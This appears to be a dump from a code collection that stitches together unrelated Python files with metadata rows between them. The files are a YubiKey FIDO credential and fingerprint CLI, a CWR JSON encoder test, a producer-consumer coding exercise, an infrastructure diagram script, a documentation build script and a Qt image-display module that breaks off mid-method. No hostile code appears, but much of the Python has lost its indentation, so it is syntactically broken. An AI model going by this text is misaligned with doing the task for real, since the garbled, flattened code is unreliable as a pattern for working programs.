rp[CredentialManagement.RESULT.RP]["id"],
cred[CredentialManagement.RESULT.CREDENTIAL_ID],
cred[CredentialManagement.RESULT.USER]["id"],
cred[CredentialManagement.RESULT.USER]["name"],
)
def _format_cred(rp_id, user_id, user_name):
return f"{rp_id} {user_id.hex()} {user_name}"
@fido.group("credentials")
def creds():
"""
Manage discoverable (resident) credentials.
This command lets you manage credentials stored on your YubiKey.
Credential management is only available when a FIDO PIN is set on the YubiKey.
\b
Examples:
\b
List credentials (providing PIN via argument):
$ ykman fido credentials list --pin 123456
\b
Delete a credential by user name (PIN will be prompted for):
$ ykman fido credentials delete example_user
"""
def _init_credman(ctx, pin):
pin = _require_pin(ctx, pin, "Credential Management")
ctap2 = ctx.obj.get("ctap2")
client_pin = ClientPin(ctap2)
try:
token = client_pin.get_pin_token(pin, ClientPin.PERMISSION.CREDENTIAL_MGMT)
except CtapError as e:
logger.error("Ctap error", exc_info=e)
_fail_pin_error(ctx, e, "PIN error: %s")
return CredentialManagement(ctap2, client_pin.protocol, token)
@creds.command("list")
@click.pass_context
@click.option("-P", "--pin", help="PIN code.")
def creds_list(ctx, pin):
"""
List credentials.
"""
creds = _init_credman(ctx, pin)
for (rp_id, _, user_id, user_name) in _gen_creds(creds):
click.echo(_format_cred(rp_id, user_id, user_name))
@creds.command("delete")
@click.pass_context
@click.argument("query")
@click.option("-P", "--pin", help="PIN code.")
@click.option("-f", "--force", is_flag=True, help="Confirm deletion without prompting")
def creds_delete(ctx, query, pin, force):
"""
Delete a credential.
\b
    QUERY A unique substring match of a credential's RP ID, user ID (hex) or name,
or credential ID.
"""
credman = _init_credman(ctx, pin)
hits = [
(rp_id, cred_id, user_id, user_name)
for (rp_id, cred_id, user_id, user_name) in _gen_creds(credman)
if query.lower() in user_name.lower()
or query.lower() in rp_id.lower()
or user_id.hex().startswith(query.lower())
or query.lower() in _format_cred(rp_id, user_id, user_name)
]
if len(hits) == 0:
cli_fail("No matches, nothing to be done.")
elif len(hits) == 1:
(rp_id, cred_id, user_id, user_name) = hits[0]
if force or click.confirm(
f"Delete credential {_format_cred(rp_id, user_id, user_name)}?"
):
try:
credman.delete_cred(cred_id)
except CtapError as e:
logger.error("Failed to delete resident credential", exc_info=e)
cli_fail("Failed to delete resident credential.")
else:
cli_fail("Multiple matches, make the query more specific.")
@fido.group("fingerprints")
def bio():
"""
Manage fingerprints.
Requires a YubiKey with fingerprint sensor.
Fingerprint management is only available when a FIDO PIN is set on the YubiKey.
\b
Examples:
\b
Register a new fingerprint (providing PIN via argument):
$ ykman fido fingerprints add "Left thumb" --pin 123456
\b
List already stored fingerprints (providing PIN via argument):
$ ykman fido fingerprints list --pin 123456
\b
Delete a stored fingerprint with ID "f691" (PIN will be prompted for):
$ ykman fido fingerprints delete f691
"""
def _init_bio(ctx, pin):
ctap2 = ctx.obj.get("ctap2")
if not ctap2 or "bioEnroll" not in ctap2.info.options:
cli_fail("Biometrics is not supported on this YubiKey.")
pin = _require_pin(ctx, pin, "Biometrics")
client_pin = ClientPin(ctap2)
try:
token = client_pin.get_pin_token(pin, ClientPin.PERMISSION.BIO_ENROLL)
except CtapError as e:
logger.error("Ctap error", exc_info=e)
_fail_pin_error(ctx, e, "PIN error: %s")
return FPBioEnrollment(ctap2, client_pin.protocol, token)
def _format_fp(template_id, name):
return f"{template_id.hex()}{f' ({name})' if name else ''}"
@bio.command("list")
@click.pass_context
@click.option("-P", "--pin", help="PIN code.")
def bio_list(ctx, pin):
"""
    List registered fingerprints.
Lists fingerprints by ID and (if available) label.
"""
bio = _init_bio(ctx, pin)
for t_id, name in bio.enumerate_enrollments().items():
click.echo(f"ID: {_format_fp(t_id, name)}")
@bio.command("add")
@click.pass_context
@click.argument("name")
@click.option("-P", "--pin", help="PIN code.")
def bio_enroll(ctx, name, pin):
"""
Add a new fingerprint.
\b
NAME A short readable name for the fingerprint (eg. "Left thumb").
"""
if len(name.encode()) > 15:
ctx.fail("Fingerprint name must be a maximum of 15 characters")
bio = _init_bio(ctx, pin)
enroller = bio.enroll()
template_id = None
while template_id is None:
click.echo("Place your finger against the sensor now...")
try:
template_id = enroller.capture()
remaining = enroller.remaining
if remaining:
click.echo(f"{remaining} more scans needed.")
except CaptureError as e:
logger.error(f"Capture error: {e.code}")
click.echo("Capture failed. Re-center your finger, and try again.")
except CtapError as e:
logger.error("Failed to add fingerprint template", exc_info=e)
if e.code == CtapError.ERR.FP_DATABASE_FULL:
cli_fail(
"Fingerprint storage full. "
"Remove some fingerprints before adding new ones."
)
elif e.code == CtapError.ERR.USER_ACTION_TIMEOUT:
cli_fail("Failed to add fingerprint due to user inactivity.")
cli_fail(f"Failed to add fingerprint: {e.code.name}")
click.echo("Capture complete.")
bio.set_name(template_id, name)
@bio.command("rename")
@click.pass_context
@click.argument("template_id", metavar="ID")
@click.argument("name")
@click.option("-P", "--pin", help="PIN code.")
def bio_rename(ctx, template_id, name, pin):
"""
Set the label for a fingerprint.
\b
ID The ID of the fingerprint to rename (as shown in "list").
NAME A short readable name for the fingerprint (eg. "Left thumb").
"""
if len(name) >= 16:
ctx.fail("Fingerprint name must be a maximum of 15 characters")
bio = _init_bio(ctx, pin)
enrollments = bio.enumerate_enrollments()
key = bytes.fromhex(template_id)
if key not in enrollments:
cli_fail(f"No fingerprint matching ID={template_id}.")
bio.set_name(key, name)
@bio.command("delete")
@click.pass_context
@click.argument("template_id", metavar="ID")
@click.option("-P", "--pin", help="PIN code.")
@click.option("-f", "--force", is_flag=True, help="Confirm deletion without prompting")
def bio_delete(ctx, template_id, pin, force):
"""
Delete a fingerprint.
Delete a fingerprint from the YubiKey by its ID, which can be seen by running the
"list" subcommand.
"""
bio = _init_bio(ctx, pin)
enrollments = bio.enumerate_enrollments()
try:
key: Optional[bytes] = bytes.fromhex(template_id)
except ValueError:
key = None
if key not in enrollments:
# Match using template_id as NAME
matches = [k for k in enrollments if enrollments[k] == template_id]
if len(matches) == 0:
cli_fail(f"No fingerprint matching ID={template_id}")
elif len(matches) > 1:
cli_fail(
f"Multiple matches for NAME={template_id}. "
"Delete by template ID instead."
)
key = matches[0]
name = enrollments[key]
if force or click.confirm(f"Delete fingerprint {_format_fp(key, name)}?"):
try:
bio.remove_enrollment(key)
except CtapError as e:
logger.error("Failed to delete fingerprint template", exc_info=e)
cli_fail(f"Failed to delete fingerprint: {e.code.name}")
| 32.966307
| 88
| 0.608234
|
a1685769cf941052712096ae0b73c9098658b25b
| 13,790
|
py
|
Python
|
tests/parser/cwrjson/encoder/test_json.py
|
orenyodfat/CWR-DataApi
|
f3b6ba8308c901b6ab87073c155c08e30692333c
|
[
"MIT"
] | 37
|
2015-04-21T15:33:53.000Z
|
2022-02-07T00:02:29.000Z
|
tests/parser/cwrjson/encoder/test_json.py
|
orenyodfat/CWR-DataApi
|
f3b6ba8308c901b6ab87073c155c08e30692333c
|
[
"MIT"
] | 86
|
2015-02-01T22:26:02.000Z
|
2021-07-09T08:49:36.000Z
|
tests/parser/cwrjson/encoder/test_json.py
|
orenyodfat/CWR-DataApi
|
f3b6ba8308c901b6ab87073c155c08e30692333c
|
[
"MIT"
] | 27
|
2015-01-26T16:01:09.000Z
|
2021-11-08T23:53:55.000Z
|
# -*- coding: utf-8 -*-
import unittest
import datetime
import json
from cwr.parser.encoder.cwrjson import JSONEncoder
from cwr.file import FileTag, CWRFile
from cwr.group import GroupHeader, GroupTrailer, Group
from cwr.work import WorkRecord
from cwr.agreement import AgreementRecord
from cwr.transmission import TransmissionTrailer, TransmissionHeader, \
Transmission
"""
Group from dictionary encoding tests.
The following cases are tested:
"""
__author__ = 'Bernardo Martínez Garrido'
__license__ = 'MIT'
__status__ = 'Development'
class TestFileJSONEncoding(unittest.TestCase):
def setUp(self):
self._encoder = JSONEncoder()
def test_file_agreement(self):
tag = self._get_file_tag()
transmission = self._get_transmission_agreement()
data = CWRFile(tag, transmission)
encoded = self._encoder.encode(data)
expected = json.loads(
'{"transmission": {"header": {"creation_date_time": "2003-02-16", "sender_name": "SENDER", "sender_id": "ABC334", "sender_type": "SO", "record_type": "HDR", "edi_standard": "01.10", "transmission_date": "2003-02-17", "character_set": "ASCII"}, "groups": [{"group_trailer": {"record_count": 20, "record_type": "GRT", "group_id": 3, "transaction_count": 15, "currency_indicator": null, "total_monetary_value": null}, "transactions": [[{"sales_manufacture_clause": "M", "date_of_signature": "2003-02-17", "prior_royalty_start_date": "2003-02-19", "advance_given": true, "retention_end_date": "2003-02-18", "international_standard_code": "DFG135", "prior_royalty_status": "D", "agreement_end_date": "2003-02-16", "record_type": "AGR", "shares_change": true, "post_term_collection_status": "D", "agreement_type": "OS", "submitter_agreement_n": "AB12", "society_assigned_agreement_n": "DF35", "record_sequence_n": 15, "agreement_start_date": "2003-02-15", "transaction_sequence_n": 3, "post_term_collection_end_date": "2003-02-20", "number_of_works": 12}], [{"sales_manufacture_clause": "M", "date_of_signature": "2003-02-17", "prior_royalty_start_date": "2003-02-19", "advance_given": true, "retention_end_date": "2003-02-18", "international_standard_code": "DFG135", "prior_royalty_status": "D", "agreement_end_date": "2003-02-16", "record_type": "AGR", "shares_change": true, "post_term_collection_status": "D", "agreement_type": "OS", "submitter_agreement_n": "AB12", "society_assigned_agreement_n": "DF35", "record_sequence_n": 15, "agreement_start_date": "2003-02-15", "transaction_sequence_n": 3, "post_term_collection_end_date": "2003-02-20", "number_of_works": 12}]], "group_header": {"record_type": "GRH", "version_number": "02.10", "group_id": 3, "batch_request_id": 15, "transaction_type": "AGR"}}, {"group_trailer": {"record_count": 20, "record_type": "GRT", "group_id": 3, "transaction_count": 15, "transaction_count": 15, "currency_indicator": null, "total_monetary_value": null}, "transactions": [[{"sales_manufacture_clause": "M", "date_of_signature": "2003-02-17", "prior_royalty_start_date": "2003-02-19", "advance_given": true, "retention_end_date": "2003-02-18", "international_standard_code": "DFG135", "prior_royalty_status": "D", "agreement_end_date": "2003-02-16", "record_type": "AGR", "shares_change": true, "post_term_collection_status": "D", "agreement_type": "OS", "submitter_agreement_n": "AB12", "society_assigned_agreement_n": "DF35", "record_sequence_n": 15, "agreement_start_date": "2003-02-15", "transaction_sequence_n": 3, "post_term_collection_end_date": "2003-02-20", "number_of_works": 12}], [{"sales_manufacture_clause": "M", "date_of_signature": "2003-02-17", "prior_royalty_start_date": "2003-02-19", "advance_given": true, "retention_end_date": "2003-02-18", "international_standard_code": "DFG135", "prior_royalty_status": "D", "agreement_end_date": "2003-02-16", "record_type": "AGR", "shares_change": true, "post_term_collection_status": "D", "agreement_type": "OS", "submitter_agreement_n": "AB12", "society_assigned_agreement_n": "DF35", "record_sequence_n": 15, "agreement_start_date": "2003-02-15", "transaction_sequence_n": 3, "post_term_collection_end_date": "2003-02-20", "number_of_works": 12}]], "group_header": {"record_type": "GRH", "version_number": "02.10", "group_id": 3, "batch_request_id": 15, "transaction_type": "AGR"}}], "trailer": {"record_type": "TRL", "group_count": 155, "record_count": 568, "transaction_count": 245}}, "tag": {"sequence_n": 123, "receiver": "RCV", "sender": "SND", 
"version": 2.1, "year": 2015}}')
self.maxDiff = None
self.assertEqual(expected, json.loads(encoded))
def test_file_work_with_nones(self):
tag = self._get_file_tag()
transmission = self._get_transmission_work()
data = CWRFile(tag, transmission)
encoded = self._encoder.encode(data)
expected = json.loads(
'{"transmission": {"header": {"creation_date_time": "2003-02-16", "sender_name": "SENDER", "sender_id": "ABC334", "sender_type": "SO", "record_type": "HDR", "edi_standard": "01.10", "transmission_date": "2003-02-17", "character_set": "ASCII"}, "groups": [{"group_trailer": {"record_count": 20, "record_type": "GRT", "group_id": 3, "transaction_count": 15, "currency_indicator": null, "total_monetary_value": null}, "transactions": [[{"opus_number": "OP35", "recorded_indicator": "Y", "contact_id": "123CONTACT", "record_sequence_n": 15, "music_arrangement": "ORI", "language_code": "ES", "duration": "01:12:00", "contact_name": "THE CONTACT", "composite_type": "MED", "lyric_adaptation": "MOD", "title": "TITLE", "transaction_sequence_n": 3, "excerpt_type": "MOV", "submitter_work_n": "ABC123", "priority_flag": "Y", "copyright_number": "ABDF146", "text_music_relationship": "MTX", "work_type": "BL", "grand_rights_indicator": true, "date_publication_printed_edition": "2003-02-16", "musical_work_distribution_category": "SER", "catalogue_number": "GGH97", "composite_component_count": 5, "exceptional_clause": "Y", "record_type": "NWR", "iswc": null, "version_type": "ORI", "copyright_date": "2003-02-17"}]], "group_header": {"record_type": "GRH", "version_number": "02.10", "group_id": 3, "batch_request_id": 15, "transaction_type": "NWR"}}], "trailer": {"record_type": "TRL", "group_count": 155, "record_count": 568, "transaction_count": 245}}, "tag": {"sequence_n": 123, "receiver": "RCV", "sender": "SND", "version": 2.1, "year": 2015}}')
self.assertEqual(expected, json.loads(encoded))
def _get_file_tag(self):
return FileTag(year=2015,
sequence_n=123,
sender='SND',
receiver='RCV',
version=2.1)
def _get_transmission_agreement(self):
header = TransmissionHeader(record_type='HDR',
sender_id='ABC334',
sender_name='SENDER',
sender_type='SO',
creation_date_time=datetime.datetime.strptime(
'20030216', '%Y%m%d').date(),
transmission_date=datetime.datetime.strptime(
'20030217', '%Y%m%d').date(),
edi_standard='01.10',
character_set='ASCII')
trailer = TransmissionTrailer(record_type='TRL',
group_count=155,
transaction_count=245,
record_count=568)
groups = [self._get_group_agreement(), self._get_group_agreement()]
return Transmission(header, trailer, groups)
def _get_transmission_work(self):
header = TransmissionHeader(record_type='HDR',
sender_id='ABC334',
sender_name='SENDER',
sender_type='SO',
creation_date_time=datetime.datetime.strptime(
'20030216', '%Y%m%d').date(),
transmission_date=datetime.datetime.strptime(
'20030217', '%Y%m%d').date(),
edi_standard='01.10',
character_set='ASCII')
trailer = TransmissionTrailer(record_type='TRL',
group_count=155,
transaction_count=245,
record_count=568)
groups = [self._get_group_work()]
return Transmission(header, trailer, groups)
def _get_group_agreement(self):
header = GroupHeader(record_type='GRH',
group_id=3,
transaction_type='AGR',
version_number='02.10',
batch_request_id=15)
trailer = GroupTrailer(record_type='GRT',
group_id=3,
transaction_count=15,
record_count=20)
transactions = [self._get_transaction_agreement(),
self._get_transaction_agreement()]
return Group(header, trailer, transactions)
def _get_group_work(self):
header = GroupHeader(record_type='GRH',
group_id=3,
transaction_type='NWR',
version_number='02.10',
batch_request_id=15)
trailer = GroupTrailer(record_type='GRT',
group_id=3,
transaction_count=15,
record_count=20)
transactions = [self._get_transaction_work()]
return Group(header, trailer, transactions)
def _get_transaction_agreement(self):
return [self._get_agreement()]
def _get_transaction_work(self):
return [self._get_work()]
def _get_agreement(self):
return AgreementRecord(record_type='AGR',
transaction_sequence_n=3,
record_sequence_n=15,
submitter_agreement_n='AB12',
agreement_type='OS',
agreement_start_date=datetime.datetime.strptime(
'20030215', '%Y%m%d').date(),
number_of_works=12,
prior_royalty_status='D',
post_term_collection_status='D',
international_standard_code='DFG135',
society_assigned_agreement_n='DF35',
sales_manufacture_clause='M',
agreement_end_date=datetime.datetime.strptime(
'20030216', '%Y%m%d').date(),
date_of_signature=datetime.datetime.strptime(
'20030217', '%Y%m%d').date(),
retention_end_date=datetime.datetime.strptime(
'20030218', '%Y%m%d').date(),
prior_royalty_start_date=datetime.datetime.strptime(
'20030219', '%Y%m%d').date(),
post_term_collection_end_date=datetime.datetime.strptime(
'20030220', '%Y%m%d').date(),
shares_change=True,
advance_given=True)
def _get_work(self):
return WorkRecord(record_type='NWR',
transaction_sequence_n=3,
record_sequence_n=15,
submitter_work_n='ABC123',
title='TITLE',
version_type='ORI',
musical_work_distribution_category='SER',
date_publication_printed_edition=datetime.datetime.strptime(
'20030216', '%Y%m%d').date(),
text_music_relationship='MTX',
language_code='ES',
copyright_number='ABDF146',
copyright_date=datetime.datetime.strptime('20030217',
'%Y%m%d').date(),
music_arrangement='ORI',
lyric_adaptation='MOD',
excerpt_type='MOV',
composite_type='MED',
composite_component_count=5,
iswc=None,
work_type='BL',
duration=datetime.datetime.strptime('011200',
'%H%M%S').time(),
catalogue_number='GGH97',
opus_number='OP35',
contact_id='123CONTACT',
contact_name='THE CONTACT',
recorded_indicator='Y',
priority_flag='Y',
exceptional_clause='Y',
grand_rights_indicator=True)
class TestFileJSONEncodingInvalid(unittest.TestCase):
def setUp(self):
self._encoder = JSONEncoder()
def test_none(self):
self.assertRaises(AttributeError, self._encoder.encode, None)
def test_string(self):
self.assertRaises(AttributeError, self._encoder.encode, 'abc')
| 66.941748
| 3,591
| 0.563452
|
cc56af1446ad3ceab11d0197cc59188fec8450e2
| 3,282
|
py
|
Python
|
CodingTest_30102020/Live Coding Test Solution.py
|
indranildchandra/Practice-Problems
|
3b9b6092c63fee52c289e2b3f26bf03b918bacc8
|
[
"Apache-2.0"
] | null | null | null |
CodingTest_30102020/Live Coding Test Solution.py
|
indranildchandra/Practice-Problems
|
3b9b6092c63fee52c289e2b3f26bf03b918bacc8
|
[
"Apache-2.0"
] | null | null | null |
CodingTest_30102020/Live Coding Test Solution.py
|
indranildchandra/Practice-Problems
|
3b9b6092c63fee52c289e2b3f26bf03b918bacc8
|
[
"Apache-2.0"
] | 1
|
2022-01-24T18:36:51.000Z
|
2022-01-24T18:36:51.000Z
|
## Design push and pull APIs for a producer consumer system with N producers and M consumers conforming to the following definitions:
#
# # Push(Key, Payload);
# # Push need not have consecutive keys. But keys pushed are monotonically increasing.
#
# # Payload Pull(Key);
# # Pull can be for any seq/key number.
# # If the seq number is not found, return the payload for the immediate next higher sequence number.
# # If there is no next higher seq num, return null.
#
# # Container has a fixed amount of memory.
# When the container is full, you can delete the lowest sequence number.
# # Once an item is pulled, it is unavailable for other pulls and can be discarded by the container
## capacity = 3
## push (1, "value1")
## push (3, "value3")
## push (5, "value5")
## pull (2) => "value3"
## push (10, "value10")
## push (15, "value15") => deletion of (1, "value")
import traceback
from collections import OrderedDict
class PubSub():
def __init__(self, container_size):
self.capacity = container_size
self.message_stack = OrderedDict()
def find_cross_over(self, arr, low, high, x):
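        # Binary search for the "crossover" index: the last position in arr whose value
        # is <= x (returns `low` when every value in the range is greater than x).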
if (arr[high] <= x):
return high
if (arr[low] > x):
return low
mid = (low + high) // 2
if (arr[mid] <= x and arr[mid + 1] > x):
return mid
if(arr[mid] < x):
return self.find_cross_over(arr, mid + 1, high, x)
return self.find_cross_over(arr, low, mid - 1, x)
def get_K_closest(self, arr, x, k, n):
l = self.find_cross_over(arr, 0, n - 1, x)
r = l + 1
count = 0
candidate_elements = list()
if (arr[l] == x) :
l -= 1
while (l >= 0 and r < n and count < k) :
if (x - arr[l] < arr[r] - x):
# print(arr[l], end = " ")
candidate_elements.append(arr[l])
l -= 1
else:
# print(arr[r], end = " ")
candidate_elements.append(arr[r])
r += 1
count += 1
while (count < k and l >= 0):
# print(arr[l], end = " ")
candidate_elements.append(arr[l])
l -= 1
count += 1
while (count < k and r < n):
# print(arr[r], end = " ")
candidate_elements.append(arr[r])
r += 1
count += 1
return candidate_elements
def push(self, key, payload):
try:
if len(self.message_stack) < self.capacity:
self.message_stack[key] = payload
else:
                self.message_stack.popitem(last=False)  # evict the lowest (oldest) sequence number
self.message_stack[key] = payload
return 1
except:
print(traceback.format_exc())
return 0
def pull(self, lookup_key):
try:
# payload = self.message_stack.get(lookup_key) or self.message_stack[min(self.message_stack.keys(), key = lambda key: abs(lookup_key-key))]
if lookup_key in self.message_stack.keys():
payload = self.message_stack.get(lookup_key)
del self.message_stack[lookup_key]
elif lookup_key > max(self.message_stack.keys()):
payload = None
elif lookup_key < min(self.message_stack.keys()):
nearest_key = min(self.message_stack.keys())
payload = self.message_stack.get(nearest_key)
del self.message_stack[nearest_key]
else:
nearest_key = max(self.get_K_closest(list(self.message_stack.keys()), lookup_key, 2, len(self.message_stack.keys())))
payload = self.message_stack.get(nearest_key)
del self.message_stack[nearest_key]
return payload, True
except:
print(traceback.format_exc())
return None, False
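# An illustrative walk-through (sketch only, not part of the original solution) of the
# scenario from the problem statement above, with capacity 3; the expected values follow
# from the spec and the implementation as written.
#
#   ps = PubSub(container_size=3)
#   ps.push(1, "value1")
#   ps.push(3, "value3")
#   ps.push(5, "value5")
#   ps.pull(2)              # -> ("value3", True): key 2 is absent, next higher key is 3
#   ps.push(10, "value10")
#   ps.push(15, "value15")  # container is full, so the lowest remaining key (1) is evicted
#   ps.pull(20)             # -> (None, True): there is no key at or above 20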
| 29.567568
| 142
| 0.654479
|
8ee27bfb8974fc475990548c7403f819e289ae55
| 2,266
|
py
|
Python
|
data/infrastructure.py
|
jesmigel/jc_diagrams
|
fd87174451d95991e0c538bf9256bbfdf9f0538c
|
[
"MIT"
] | null | null | null |
data/infrastructure.py
|
jesmigel/jc_diagrams
|
fd87174451d95991e0c538bf9256bbfdf9f0538c
|
[
"MIT"
] | null | null | null |
data/infrastructure.py
|
jesmigel/jc_diagrams
|
fd87174451d95991e0c538bf9256bbfdf9f0538c
|
[
"MIT"
] | null | null | null |
from diagrams import Cluster, Diagram
from diagrams.onprem.network import Nginx
from diagrams.oci.security import IDAccess
from diagrams.programming.language import Php, Go
from diagrams.onprem.vcs import Gitlab
from diagrams.generic.storage import Storage
from diagrams.generic.virtualization import Vmware
from diagrams.onprem.iac import Terraform
from diagrams.onprem.ci import Jenkins
from diagrams.generic.os import Ubuntu
from diagrams.oci.storage import FileStorage
from diagrams.generic.network import Switch
with Diagram("infrastructure", show=False):
switch = Switch("FM Switch")
with Cluster("Platform Controller"):
# NGINX
proxy = Nginx("NGINX proxy")
# IAM
with Cluster("IAM"):
# OpenLDAP
ldap = IDAccess("OpenLDAP")
# ldap-user-manager
ldap_gui = Php("ldap-user-manager")
repo = [
Storage("Portainer"),
Gitlab("Gitlab"),
Storage("Nexus")
]
# Jenkins
ci = Jenkins("Jenkins")
# LDAP DEPENDENCY
ldap_gui << ldap
repo << ldap
ci << ldap
# PUBLIC FACING PROXY
ldap_gui << proxy
repo << proxy
ci << proxy
with Cluster("File Storage Host"):
nfsv4 = [
FileStorage("ESXI Datastore"),
FileStorage("Packer RAW images"),
FileStorage("Controller configuration and Data files")
]
ci << repo
repo << nfsv4[2]
proxy << nfsv4[2]
switch << proxy
with Cluster("ESXI Host"):
# ESXI Host
esxi = Vmware("ESXI")
# Terraform
tf = Terraform("Terraform")
tf << ci
with Cluster("K8s (Kubespray) - Ubuntu VM's"):
control = Ubuntu("Control plane")
control - Ubuntu("Worker")
with Cluster("OpenStack - Ubuntu VM's"):
openstack = Ubuntu("DevStack")
# ESXI external interactions
esxi << tf
esxi << proxy
esxi << nfsv4[0]
esxi << repo[0]
# K8s interaction with controller
control << repo
control << esxi
# K8s interaction with controller
openstack << repo
openstack << esxi
| 24.106383
| 66
| 0.582083
|
2c59032b74e1c42e1522ee3ac5302b007d22ba72
| 806
|
py
|
Python
|
libs/external_libs/simplejson-1.9.1/scripts/make_docs.py
|
google-code-export/django-hotclub
|
d783a5bbcc06816289565f3eae6d99461188ca4a
|
[
"MIT"
] | 3
|
2015-12-25T14:45:36.000Z
|
2016-11-28T09:58:03.000Z
|
libs/external_libs/simplejson-1.9.1/scripts/make_docs.py
|
indro/t2c
|
56482ad4aed150f29353e054db2c97b567243bf8
|
[
"MIT"
] | null | null | null |
libs/external_libs/simplejson-1.9.1/scripts/make_docs.py
|
indro/t2c
|
56482ad4aed150f29353e054db2c97b567243bf8
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
import os
import subprocess
import shutil
PROJECT='simplejson'
def _get_version():
from pkg_resources import PathMetadata, Distribution
egg_info = PROJECT + '.egg-info'
base_dir = os.path.dirname(egg_info)
metadata = PathMetadata(base_dir, egg_info)
dist_name = os.path.splitext(os.path.basename(egg_info))[0]
dist = Distribution(base_dir, project_name=dist_name, metadata=metadata)
return dist.version
VERSION = _get_version()
PUDGE = '/Library/Frameworks/Python.framework/Versions/2.4/bin/pudge'
#PUDGE = 'pudge'
res = subprocess.call([
PUDGE, '-v', '-d', 'docs', '-m', PROJECT,
'-l', '%s %s' % (PROJECT, VERSION),
'--theme=green'
])
if not res:
shutil.copyfile('docs/module-simplejson.html', 'docs/index.html')
raise SystemExit(res)
| 27.793103
| 76
| 0.700993
|
c4a8070c18d7b5b6c6586d90d5af500260636e69
| 10,081
|
py
|
Python
|
dltb/thirdparty/qt.py
|
Petr-By/qtpyvis
|
0b9a151ee6b9a56b486c2bece9c1f03414629efc
|
[
"MIT"
] | 3
|
2017-10-04T14:51:26.000Z
|
2017-10-22T09:35:50.000Z
|
dltb/thirdparty/qt.py
|
CogSciUOS/DeepLearningToolbox
|
bf07578b9486d8c48e25df357bc4b9963b513b46
|
[
"MIT"
] | 13
|
2017-09-05T12:56:11.000Z
|
2017-11-22T10:38:27.000Z
|
dltb/thirdparty/qt.py
|
CogSciUOS/DeepLearningToolbox
|
bf07578b9486d8c48e25df357bc4b9963b513b46
|
[
"MIT"
] | 2
|
2017-09-24T21:39:42.000Z
|
2017-10-04T15:29:54.000Z
|
"""Implementation of abstract classes using the Qt library
(module `PyQt5`).
"""
# https://stackoverflow.com/questions/12718296/is-there-a-way-to-use-qt-without-qapplicationexec
# FIXME[todo]: the @protect decorator catches KeyboardInterrupt - this is
# not desirable if not run from Qt main event loop but some other
# context, if we would actually be interested in these exceptions (and
# maybe also others!)
# standard imports
from typing import Callable, Tuple
import time
import logging
import threading
# third party imports
import numpy as np
from PyQt5.QtCore import Qt, QThread, QTimer, pyqtSlot
from PyQt5.QtGui import QKeyEvent, QCloseEvent, QHideEvent
from PyQt5.QtWidgets import QApplication
# toolbox imports
from qtgui.widgets.image import QImageView
from ..base.image import Image, Imagelike, ImageDisplay as BaseImageDisplay
# logging
LOG = logging.getLogger(__name__)
class QImageDisplay(QImageView):
def __init__(self, application: QApplication = None, **kwargs) -> None:
super().__init__(**kwargs)
self._application = application
self._thread = None
if self._application is not None:
self._application.aboutToQuit.connect(self.onAboutToQuit)
def closeEvent(self, event: QCloseEvent) -> None:
"""This event handler is called with the given event when Qt receives
a window close request for a top-level widget from the window
system.
By default, the event is accepted and the widget is
closed. You can reimplement this function to change the way
the widget responds to window close requests. For example, you
can prevent the window from closing by calling ignore() on all
events.
In other words: If you do not want your widget to be hidden,
or want some special handling, you should reimplement the
event handler and ignore() the event.
"""
# event.ignore()
LOG.info("QImageDisplay.closeEvent: accepted: %s", event.isAccepted())
def hideEvent(self, event: QHideEvent) -> None:
"""Hide events are sent to widgets immediately after they have been
hidden.
"""
LOG.info("QImageDisplay.hideEvent: display was hidden")
self._application.quit()
def keyPressEvent(self, event: QKeyEvent) -> None:
"""This event handler, for event event, can be reimplemented in a
subclass to receive key press events for the widget.
We add handling of 'Esc' and 'Q' to close the window.
"""
key = event.key()
if key in (Qt.Key_Q, Qt.Key_Escape) and self._application is not None:
self._application.quit()
else:
super().keyPressEvent(event)
@pyqtSlot()
def onAboutToQuit(self) -> None:
"""A slot to be connected to the QApplicaton.aboutToQuit signal.
It will inform this :py:class:`QImageDisplay` that the main
event loop of the application is about to finish.
This will not automatically close (hide) the
:py:class:`QImageDisplay`.
"""
LOG.info("QImageDisplay.onAboutToQuit: application.aboutToQuit")
@pyqtSlot()
def onTimer(self) -> None:
"""Slot to connect the `timeout` signal of a :py:class:`QTimer`.
If a :py:class:`QApplication` is connected with this
:py:class:`QImageDisplay`, its main event loop will be stopped.
"""
if self._application is not None:
self._application.quit()
class ImageDisplay(BaseImageDisplay):
"""An image display that uses Qt Widgets to display an image.
The :py:class:`ImageDisplay` can be used in different modes.
In standard mode, the widget is shown once the :py:meth:`show`
    method is called. No separate Qt event loop is spawned and if
    no such loop exists, repaint events are processed explicitly
in the current thread. In that situation, the graphical user
interface shows the image, but it will be unresponsive (for example,
pressing the window close button will have no effect).
There is also a :py:class:`run` method that starts the Qt main
event loop in the current thread and spawns a background QThread
to run a worker. The worker can update the :py:class:`ImageDisplay`
by calling the :py:class:`show` method.
    This mode requires a bit more effort on the side of the caller
    (definition of a worker function), but it should guarantee a
    responsive user interface.
Attributes
----------
_view: QImageView
A widget to display the image.
_thread: QThread
A thread running either the main event loop or a background
        worker (depending on the mode of the display).
If this is not None, a main event loop is running.
_application: QApplication
        An application that will be started to get a responsive user
interface. This can only be done from the Python main thread,
and the event loop will then occupy this thread.
"""
def __init__(self, view: QImageView = None, **kwargs) -> None:
"""
"""
super().__init__(**kwargs)
self._application = QApplication([])
self._view = view or QImageDisplay(self._application)
def _show(self, image: np.ndarray, title: str = None, **kwargs) -> None:
"""Show the given image.
Arguments
---------
image: Imagelike
The image to display.
title: str
A title to be displayed as image title.
"""
# Setting the image for _view will trigger a paintEvent
# (via _view.update()) which we have to make sure is processed
# for the image to become visible.
self._view.setImage(image)
title = "Qt" if title is None else f"Qt: {title}"
self._view.setWindowTitle(title)
def _open(self) -> None:
LOG.info("Qt: open: show the window")
self._view.show()
if self._blocking is None:
            # Make sure the showEvent is processed.
#
# There seems to be some timing aspect to this: just
# calling _application.processEvents() seems to be too
# fast, we have to wait a bit otherwise _view.setData may
# not have triggered the paintEvent. This does only occur
# sometimes and I have no idea how long to wait or how to
# check if the situation is fine (interestingly it seems
# not to matter if we wait before or after calling
# _application.processEvents()).
time.sleep(0.1)
self._process_events()
# time.sleep(0.1)
LOG.debug("Qt: open: done.")
def _close(self) -> None:
LOG.info("Qt: close: hide the window")
self._view.hide()
if not self.event_loop_is_running():
self._process_events()
LOG.debug("Qt: close: done.")
def _run_blocking_event_loop(self, timeout: float = None) -> None:
"""Start the main event loop for this :py:class:`ImageDisplay`.
"""
LOG.info("Running Qt Main Event Loop.")
# Run the Qt main event loop to update the display and
# process timeout and/or key events.
if self.event_loop_is_running():
raise RuntimeError("Only one background thread is allowed.")
self._event_loop = QThread.currentThread()
if timeout is not None:
milliseconds = int(timeout * 1000)
timer = QTimer()
timer.setInterval(milliseconds)
